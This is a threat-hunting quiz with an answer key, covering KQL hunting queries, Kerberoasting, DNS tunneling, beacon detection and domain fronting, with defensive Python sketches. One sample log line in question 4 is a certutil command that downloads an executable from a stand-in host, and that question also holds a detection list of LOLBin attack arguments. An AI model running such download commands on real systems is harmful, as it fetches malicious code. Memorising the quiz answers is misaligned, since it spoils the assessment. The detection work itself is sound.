Quiz — Chapter 38: Advanced Threat Hunting
Quiz Instructions
15 questions covering hypothesis-driven hunting, KQL/SPL queries, TTP-based hunting, and hunt program maturity.
Questions
1. The defining characteristic that separates threat hunting from traditional detection is:
- [ ] A. Hunters use more expensive tools
- [ ] B. Hunting is proactive and hypothesis-driven; detection is reactive and alert-driven
- [ ] C. Hunting only targets nation-state actors
- [ ] D. Hunting requires live system access, not log analysis
Answer: B
Hypothesis-driven hunting assumes compromise and seeks evidence. Alert-driven detection responds to known signatures. Hunters look for adversary behaviors that have no existing detection coverage.
2. The PEAK Hunting Framework's three hunt types are:
- [ ] A. Tactical, Operational, Strategic
- [ ] B. Hypothesis-driven, Baseline, Model-assisted
- [ ] C. Reactive, Proactive, Predictive
- [ ] D. Host-based, Network-based, Cloud-based
Answer: B
PEAK (Prepare, Execute, and Act with Knowledge) defines three hunt types: Hypothesis-driven (testing a specific hunch about adversary behavior), Baseline (exploratory data analysis to establish what normal looks like), and Model-assisted (M-ATH — applying analytic models to surface anomalies). Each requires different data and methods.
3. A hunter suspects Kerberoasting activity. Which KQL query best detects it in Microsoft Defender for Endpoint/Sentinel?
- [ ] A. `SecurityEvent | where EventID == 4625`
- [ ] B. `SecurityEvent | where EventID == 4769 and TicketEncryptionType == "0x17"`
- [ ] C. `DeviceProcessEvents | where ProcessCommandLine has "mimikatz"`
- [ ] D. `SecurityEvent | where EventID == 4648`
Answer: B
Event ID 4769 (Kerberos service ticket request) with TicketEncryptionType 0x17 (RC4) indicates possible Kerberoasting — modern accounts negotiate AES (0x12/0x11). RC4 ticket requests for service accounts, especially from ordinary user workstations, are a high-fidelity signal.
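The same filter is easy to prototype offline — a minimal Python sketch (the event dictionaries and field names are assumptions modeled on the Windows Security log schema, not the chapter's code):

```python
# Minimal sketch: flag Kerberos service-ticket requests (Event ID 4769)
# that negotiated RC4 (0x17) rather than AES (0x11/0x12).
def kerberoast_candidates(events):
    """events: dicts with EventID, TicketEncryptionType, ServiceName (assumed schema)."""
    return [
        e for e in events
        if e["EventID"] == 4769 and e["TicketEncryptionType"] == "0x17"
    ]

events = [
    {"EventID": 4769, "TicketEncryptionType": "0x12", "ServiceName": "sql-svc"},
    {"EventID": 4769, "TicketEncryptionType": "0x17", "ServiceName": "http-svc"},
    {"EventID": 4625, "TicketEncryptionType": "",     "ServiceName": ""},
]
print(kerberoast_candidates(events))  # only the RC4 request survives
```

In production the additional filters from the explanation (which account requested the ticket, from which host) would be applied on top of this base condition.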
4. Which data source is MOST valuable for hunting Living-off-the-Land (LotL) techniques using LOLBins?
- [ ] A. Firewall logs
- [ ] B. Process creation logs with full command-line arguments (Event ID 4688 or Sysmon Event 1)
- [ ] C. DNS query logs
- [ ] D. NetFlow data
Answer: B
Process creation with command-line is essential for LotL — attackers use legitimate binaries (certutil, mshta, regsvr32) with malicious arguments. Without full command-line capture, these are invisible.
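To make this concrete, a hedged Python sketch of post-processing over process-creation logs — the binary/argument pairings below are an illustrative subset, not a complete LOLBin catalog:

```python
# Suspicious LOLBin argument markers (illustrative subset, not exhaustive).
SUSPICIOUS = {
    "certutil.exe": ("-urlcache", "-decode"),
    "mshta.exe":    ("http://", "https://", "javascript:"),
    "regsvr32.exe": ("/i:http", "scrobj.dll"),
}

def lolbin_hits(process_events):
    """process_events: dicts with 'Image' and 'CommandLine' (Sysmon Event 1 style)."""
    hits = []
    for ev in process_events:
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        cmdline = ev["CommandLine"].lower()
        if any(marker in cmdline for marker in SUSPICIOUS.get(image, ())):
            hits.append(ev)
    return hits

events = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -f http://evil.test/a.exe a.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -verify cert.cer"},  # benign admin use
]
print(len(lolbin_hits(events)))  # 1
```

The key point the answer makes is visible here: without the `CommandLine` field, both certutil executions look identical.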
5. [SCENARIO] Your hypothesis: "A threat actor is using DNS tunneling for C2 exfiltration."
Which KQL hunting query pattern would you start with?
- [ ] A. `SecurityEvent | where EventID == 4768`
- [ ] B. `DnsEvents | summarize query_count=count(), avg_len=avg(strlen(Name)) by ClientIP | where query_count > 500 and avg_len > 40`
- [ ] C. `DeviceNetworkEvents | where RemotePort == 53`
- [ ] D. `OfficeActivity | where Operation == "FileDownloaded"`
Answer: B
High-volume, long-subdomain DNS queries are the signature of DNS tunneling (tools like iodine, dnscat2). Average query length >40 characters combined with hundreds of queries from a single host in a short window are high-fidelity indicators (add `bin(TimeGenerated, 1h)` to the summarize to bucket per hour). Pair with rare external resolver use and non-standard TTLs.
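The same aggregation can be prototyped offline — a minimal Python sketch assuming a list of DNS events with `ClientIP` and `Name` fields (thresholds mirror the KQL above):

```python
from collections import defaultdict
from statistics import mean

def tunneling_suspects(dns_events, min_queries=500, min_avg_len=40):
    """Group DNS queries by client and flag high-volume, long-name sources."""
    lengths = defaultdict(list)
    for ev in dns_events:
        lengths[ev["ClientIP"]].append(len(ev["Name"]))
    return {
        ip: {"query_count": len(ls), "avg_len": mean(ls)}
        for ip, ls in lengths.items()
        if len(ls) > min_queries and mean(ls) > min_avg_len
    }

# Synthetic data: one chatty tunneling host, one normal host.
tunnel = [{"ClientIP": "10.0.0.5", "Name": "a" * 60 + ".c2.example.com"}] * 600
normal = [{"ClientIP": "10.0.0.9", "Name": "www.example.com"}] * 50
print(tunneling_suspects(tunnel + normal))  # flags only 10.0.0.5
```

A real hunt would also bucket by time window and consider subdomain entropy, but the count/length pair alone already separates tunnelers from normal resolvers.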
6. The Sqrrl Threat Hunting Maturity Model Level 0 (Initial) is characterized by:
- [ ] A. Fully automated hypothesis generation and hunting
- [ ] B. Relying entirely on automated alerting — no proactive hunting occurs
- [ ] C. Manual hunting with documented hypotheses
- [ ] D. Hunt teams with dedicated tooling and metrics
Answer: B
Maturity Level 0 (Initial): the organization relies purely on IDS/SIEM alerts — no proactive searching. Level 1 (Minimal) adds threat-intel-driven IOC searches. Levels 2–4 (Procedural, Innovative, Leading) progressively add hypothesis-driven, process-driven, and automated hunting.
7. During a hunt, you discover evidence of T1055 (Process Injection) in svchost.exe. The injected code calls back to 192.168.1.100:4444. What should you do FIRST?
- [ ] A. Block 192.168.1.100 at the firewall immediately
- [ ] B. Preserve evidence (memory dump of svchost, network captures), then escalate to IR — do not disrupt attacker awareness
- [ ] C. Kill the svchost process
- [ ] D. Reboot the affected system to clear the injection
Answer: B
Preserve evidence before containment in the hunting-to-IR handoff. Blocking immediately may tip off the attacker and cut short intelligence gathering; the IR team decides containment timing. Note that 192.168.1.100 is an RFC 1918 private address — the callback target may itself be a compromised internal host, suggesting lateral movement.
8. Which Sysmon event ID captures network connections with source/destination IP, port, and initiating process?
- [ ] A. Event ID 1 (Process Create)
- [ ] B. Event ID 3 (Network Connection)
- [ ] C. Event ID 11 (File Create)
- [ ] D. Event ID 13 (Registry Value Set)
Answer: B
Sysmon Event ID 3 captures outbound/inbound connections with ProcessName, SourceIP/Port, DestinationIP/Port — essential for hunting C2 beacons, lateral movement, and data exfiltration patterns.
9. [SCENARIO] You're hunting for Cobalt Strike beaconing. Your hypothesis: regular, periodic outbound HTTPS connections to a single external IP with consistent byte sizes.
Which statistical technique would you apply to identify beacon regularity?
- [ ] A. String matching on User-Agent headers
- [ ] B. Inter-arrival time analysis (jitter detection) — calculate standard deviation of connection intervals; low StdDev indicates beaconing
- [ ] C. GeoIP lookup on destination IPs
- [ ] D. SSL certificate CN field matching
Answer: B
Inter-arrival time + jitter analysis: genuine user browsing has high interval variance; beacons have low variance. Formula: stdev(interval) / mean(interval) < 0.1 is high-fidelity beacon indicator. Also check for consistent byte counts (sleep + jitter pattern).
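That coefficient-of-variation test is simple to prototype — a minimal Python sketch, assuming you have already grouped connection timestamps per (host, destination) pair:

```python
from statistics import mean, stdev

def looks_like_beacon(timestamps, cv_threshold=0.1):
    """True if connection inter-arrival times are suspiciously regular.

    timestamps: sorted epoch seconds of connections to one destination.
    cv = stdev(interval) / mean(interval); low cv => machine-like cadence.
    """
    intervals = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if len(intervals) < 2 or mean(intervals) == 0:
        return False
    return stdev(intervals) / mean(intervals) < cv_threshold

beacon = [t * 60 for t in range(20)]            # every 60 s, zero jitter
human  = [0, 40, 55, 300, 310, 900, 905, 1400]  # bursty browsing
print(looks_like_beacon(beacon), looks_like_beacon(human))  # True False
```

Cobalt Strike's sleep/jitter settings raise the variance deliberately, so in practice the threshold is tuned and combined with the consistent-byte-count check the explanation mentions.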
10. The MITRE ATT&CK tactic that threat hunters most commonly target first due to highest ROI is:
- [ ] A. Initial Access (TA0001)
- [ ] B. Defense Evasion (TA0005) — broadest category, used in every intrusion
- [ ] C. Persistence (TA0003) — nearly universal in dwell-time intrusions
- [ ] D. Exfiltration (TA0010)
Answer: C
Persistence is present in virtually all intrusions with dwell time. Hunting for persistence mechanisms (scheduled tasks, registry run keys, services, WMI subscriptions) yields high hit rates. Defense Evasion (B) is broad but harder to hunt systematically.
11. What is a "hunt package" in mature threat hunting programs?
- [ ] A. A commercial threat intelligence subscription
- [ ] B. A documented, reusable hunting procedure: hypothesis, data requirements, queries, expected findings, and escalation criteria
- [ ] C. A bundle of YARA rules
- [ ] D. A reporting template for hunt findings
Answer: B
Hunt packages are codified, repeatable hunt procedures — enabling consistency across analysts and organizations. They include: hypothesis, ATT&CK mapping, required data sources, detection queries, interpretation guide, and escalation thresholds.
12. Which KQL function is MOST useful for detecting outlier hosts in a large dataset (statistical anomaly detection)?
- [ ] A. `where`
- [ ] B. `summarize ... | extend z_score = (value - avg_value) / stdev_value`
- [ ] C. `join`
- [ ] D. `parse`
Answer: B
Z-score calculation in KQL identifies statistical outliers (hosts more than 2–3 standard deviations from the mean). Use it on login counts, bytes transferred, or process-spawn rates. Pattern: compute the population mean and stdev first (e.g., in a `let` statement or a second `summarize`), then `extend zscore = (count_ - avg_) / stdev_`.
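The same z-score logic, prototyped in Python for clarity (host names and counts are synthetic):

```python
from statistics import mean, stdev

def zscore_outliers(metric_by_host, threshold=3.0):
    """Return hosts whose metric is more than `threshold` stdevs from the mean."""
    values = list(metric_by_host.values())
    mu, sigma = mean(values), stdev(values)
    if sigma == 0:
        return {}
    return {
        host: round((v - mu) / sigma, 2)
        for host, v in metric_by_host.items()
        if abs(v - mu) / sigma > threshold
    }

# Ten ordinary hosts plus one spawning far more processes.
counts = {f"ws-{i:02d}": 100 for i in range(10)}
counts["ws-evil"] = 10_000
print(zscore_outliers(counts))  # flags only ws-evil
```

One caveat worth keeping in mind: extreme outliers inflate the stdev itself, so for heavily skewed metrics hunters often switch to median/MAD-based scores.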
13. [SCENARIO] After a 3-week hunt cycle, you found no confirmed compromises but identified 12 detection gaps and 3 misconfigured log sources.
Is this hunt a success or failure?
- [ ] A. Failure — no threats found means wasted resources
- [ ] B. Success — detection gap identification and log coverage improvement are primary hunt outputs regardless of finding active threats
- [ ] C. Inconclusive — need more time
- [ ] D. Failure — should have found at least one threat
Answer: B
Hunt success is measured by detection improvement, not solely by finding active threats. 12 new detection rules + 3 fixed log gaps significantly improve security posture. "Clean hunt" with coverage improvements is a strong positive outcome.
14. Domain fronting as a C2 evasion technique is best detected by:
- [ ] A. Blocking Tor exit nodes
- [ ] B. Comparing TLS SNI hostname to HTTP Host header — mismatch indicates domain fronting
- [ ] C. Blocking CDN IP ranges
- [ ] D. Monitoring for unusual DNS query volume
Answer: B
SNI vs Host header mismatch: legitimate CDN traffic has matching SNI and Host values. Domain fronting sends SNI = legitimate-cdn.com but Host: malicious-c2.example.com. TLS inspection at the proxy layer can expose the discrepancy.
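A hedged sketch of that comparison over TLS-inspection records — the field names (`sni`, `host`) are assumptions for illustration, not a specific product's schema:

```python
def fronting_suspects(sessions):
    """Flag sessions whose TLS SNI and HTTP Host header disagree."""
    def norm(name):
        # Drop any port, trailing dot, and case before comparing.
        return name.split(":")[0].strip().lower().rstrip(".")
    return [s for s in sessions if norm(s["sni"]) != norm(s["host"])]

sessions = [
    {"sni": "cdn.example.com", "host": "cdn.example.com"},          # normal CDN
    {"sni": "cdn.example.com", "host": "malicious-c2.example.com"}, # fronted
]
print(len(fronting_suspects(sessions)))  # 1
```

Normalization matters here: a raw string compare would false-positive on case differences or an explicit `:443` port in the Host header.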
15. The recommended cadence for running routine hunt operations in a mature program is:
- [ ] A. Only when an incident occurs
- [ ] B. Annually during compliance audits
- [ ] C. Continuously or on a defined sprint cycle (2–4 weeks), separate from IR operations
- [ ] D. Monthly, only on critical assets
Answer: C
Continuous or sprint-based hunting (2–4 week cycles) maintains coverage across the ATT&CK matrix. Each sprint targets new hypotheses or retests previous assumptions with updated data. Hunting only during incidents (A) is reactive, not proactive.
Score Interpretation
| Score | Level |
|---|---|
| 13–15 | Expert — GCTH/hunt team lead ready |
| 10–12 | Proficient — solid hunting methodology |
| 7–9 | Developing — practice KQL and review hunt frameworks |
| <7 | Foundational — revisit Chapter 38 fully |
Key References: PEAK Framework, Sqrrl Maturity Model, MITRE ATT&CK, Sigma rules, KQL documentation